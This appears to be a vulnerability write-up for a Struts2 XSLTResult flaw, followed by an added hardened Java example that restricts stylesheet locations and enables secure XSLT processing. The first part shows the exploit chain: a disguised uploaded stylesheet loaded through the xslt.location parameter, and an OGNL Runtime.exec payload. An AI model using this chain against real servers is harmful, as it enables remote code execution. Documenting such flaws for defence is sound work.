The affected file:
http://svn.apache.org/repos/asf/struts/struts2/trunk/core/src/main/java/org/apache/struts2/views/xslt/XSLTResult.java
// The stylesheet path is read directly from a request parameter ...
String pathFromRequest = ServletActionContext.getRequest().getParameter("xslt.location");
path = pathFromRequest;
// ... and whatever resource it names is compiled as an XSLT template.
URL resource = ServletActionContext.getServletContext().getResource(path);
templates = factory.newTemplates(new StreamSource(resource.openStream()));
An action that uses XSLTResult:
An attacker can upload a file:
/upload/7758521.gif
hacked by kxlzx
http://www.inbreak.net
Then open the URL:
http://www.inbreak.net/xslt.action?xslt.location=upload/7758521.gif
Struts2 will then execute:
ognl:getValue('@Runtime@getRuntime().exec("calc")', '')
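
A hardened counterpart to the excerpt above, as an added example that is not Struts code: the stylesheet location comes only from configuration and must sit under a fixed directory, and the TransformerFactory is created with secure processing so that the JDK's built-in XSLT processor refuses extension-function calls like the one on the last line. The class name SafeStylesheet, the /WEB-INF/xslt/ root, the sample paths and the use of the JDK's built-in processor are assumptions.

```java
import java.util.List;
import javax.xml.XMLConstants;
import javax.xml.transform.TransformerConfigurationException;
import javax.xml.transform.TransformerFactory;

// Added example, not Struts code. SafeStylesheet, ALLOWED_ROOT and the
// sample paths are assumptions made for illustration.
public class SafeStylesheet {
    // Assumed convention: stylesheets ship under WEB-INF, which the container
    // never serves directly and which upload handlers never write to.
    static final String ALLOWED_ROOT = "/WEB-INF/xslt/";

    // Accepts only the location configured for the result (never a request
    // parameter), and only if it names an .xsl file directly under ALLOWED_ROOT.
    static String checkLocation(String configured) {
        if (configured == null) throw new IllegalArgumentException("no stylesheet configured");
        String p = configured.startsWith("/") ? configured : "/" + configured;
        boolean ok = p.startsWith(ALLOWED_ROOT) && p.endsWith(".xsl")
                && !p.contains("..") && !p.contains("\\") && !p.contains("%")
                && p.indexOf('/', ALLOWED_ROOT.length()) < 0; // no subdirectories
        if (!ok) throw new IllegalArgumentException("not under " + ALLOWED_ROOT + ": " + configured);
        return p;
    }

    // Factory used to compile the stylesheet: secure processing on, and no
    // external DTD or stylesheet fetches (xsl:import, xsl:include, document()).
    static TransformerFactory hardenedFactory() throws TransformerConfigurationException {
        TransformerFactory f = TransformerFactory.newInstance();
        f.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        f.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
        f.setAttribute(XMLConstants.ACCESS_EXTERNAL_STYLESHEET, "");
        return f;
    }

    public static void main(String[] args) throws Exception {
        hardenedFactory(); // throws if the processor cannot be hardened
        // Constructed inputs: a packaged stylesheet, the uploaded path from
        // the page, and a traversal attempt.
        List<String> samples = List.of("/WEB-INF/xslt/report.xsl",
                "upload/7758521.gif", "/WEB-INF/xslt/../../upload/x.xsl");
        for (String loc : samples) {
            try {
                System.out.println("accepted: " + checkLocation(loc));
            } catch (IllegalArgumentException e) {
                System.out.println("rejected: " + e.getMessage());
            }
        }
    }
}
```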